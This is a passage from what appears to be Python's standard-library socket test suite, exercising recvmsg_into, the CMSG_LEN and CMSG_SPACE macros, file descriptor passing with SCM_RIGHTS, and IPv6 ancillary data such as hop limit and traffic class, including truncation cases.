self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
